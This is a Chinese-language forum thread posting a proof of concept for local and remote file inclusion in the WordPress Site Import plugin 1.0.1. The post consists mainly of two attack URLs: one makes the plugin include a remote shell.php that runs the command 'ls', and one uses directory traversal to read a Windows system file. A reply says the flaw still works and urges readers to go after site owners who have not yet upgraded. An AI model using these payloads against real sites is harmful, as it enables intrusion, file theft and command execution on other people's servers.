请选择 进入手机版 | 继续访问电脑版
查看: 2685|回复: 1

Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞

[复制链接]
  • TA的每日心情

    4 天前
  • 签到天数: 928 天

    [LV.10]以坛为家III

    发表于 2016-3-15 10:02:27 | 显示全部楼层 |阅读模式
    [PoC]

    [PHP] 纯文本查看 复制代码
    ======================================
    远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
    本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
    =================================
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-9-13 00:40
  • 签到天数: 444 天

    [LV.9]以坛为家II

    发表于 2016-3-15 20:54:13 | 显示全部楼层
    这个漏洞还是挺有效的,不过貌似这个插件最新版本已经修补了。
    不过可以去纠结一下还没有升级的站长
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表